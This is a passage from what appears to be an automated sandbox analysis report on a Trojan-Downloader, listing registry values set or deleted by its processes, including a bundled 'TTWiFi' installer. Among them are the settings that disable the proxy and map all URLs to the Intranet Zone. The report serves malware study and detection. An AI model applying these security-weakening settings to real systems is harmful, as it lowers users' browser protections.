The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process AutoTime.exe:496 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1462263245"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\AutoTime]
"TmN" = "51477"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 66 02 6F 83 ED 3A AB AA 20 7B DE 71 CA 2B 52"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "AutoTime.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\AutoTime\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\AutoTime\DEBUG]
"Trace Level"

The process nsk1B.tmp:2824 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 59 95 5E 57 67 18 35 93 7F 2E 66 29 B2 39 B9"

The process nsk1B.tmp:3456 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"UninstallString" = "%Program Files%\ttwifi\unins000.exe"
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"UninstallDataFile" = "%Program Files%\ttwifi\unins000.dat"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: User" = "%CurrentUserName%"
"DisplayName" = "TTWiFi 1.0.0.1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"MajorVersion" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"QuietUninstallString" = "%Program Files%\ttwifi\unins000.exe /SILENT"
"Inno Setup: Setup Version" = "5.4.2.ee2 (a)"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: Selected Tasks" = "desktopicon"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"InstallLocation" = "%Program Files%\ttwifi\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\osTip]
"Params" = "5DB9279D5A0CB29AA3ED55D055708882"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"DisplayIcon" = "%Program Files%\ttwifi\tiantianwifi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: Language" = "default"
"Inno Setup: Icon Group" = "ttwifi"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"InstallDate" = "20160620"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: App Path" = "%Program Files%\ttwifi"
"DisplayVersion" = "1.0.0.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 35 AF EC 46 D6 05 77 7D E4 99 30 3A B6 4D 1E"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\WindowsMsg]
"osmsg.exe" = "osmsg"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\ttwifi]
"tiantianwifi.exe" = "TTWIFI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"MinorVersion" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\ttwifi]
"InstallTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-DOMJK.tmp]
"hp.exe" = "hp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ttwifi]
"Inno Setup: Deselected Tasks" = ""

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process nsk1B.tmp:3440 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 29 5D 46 1A CE 50 8B 01 70 C1 7E 65 3D CC C9"

The process nsk1B.tmp:2856 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\ttwifi]
"Params" = "5DB9279D5A0CB29AA3ED55D055708882"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsk1B\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 B1 1C 3C 60 0D 10 DE 61 FB FA 98 71 B1 9A 43"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\nsk1B\DEBUG]
"Trace Level"

The process nsb10.tmp:2136 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 5F 02 F9 86 1A B3 77 C4 B5 48 7D 27 03 BD 2A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopupProduct]
"DisplayIcon" = "/fd="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process qnsm13.tmp:2596 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 60 4F 12 0A 6E CE C6 90 43 2B EE 56 5B EF FC"

The process qnsm13.tmp:2588 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 44 34 02 61 29 BA 9C 2B 0D F4 0B 63 61 50 93"

The process testversion.exe:820 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 94 A0 0C B6 F6 CE F6 76 D8 F9 97 25 92 4C B9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process osmsg.exe:2332 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 4F 62 CF 24 37 B3 E2 CA 26 80 B4 C4 BC 48 37"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process osmsg.exe:2564 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\osmsg\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\osTip\actv]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 50 4F B9 63 86 74 39 17 60 1E B5 60 8A 0F A4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\osTip]
"InstallTime" = "Type: REG_QWORD, Length: 8"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

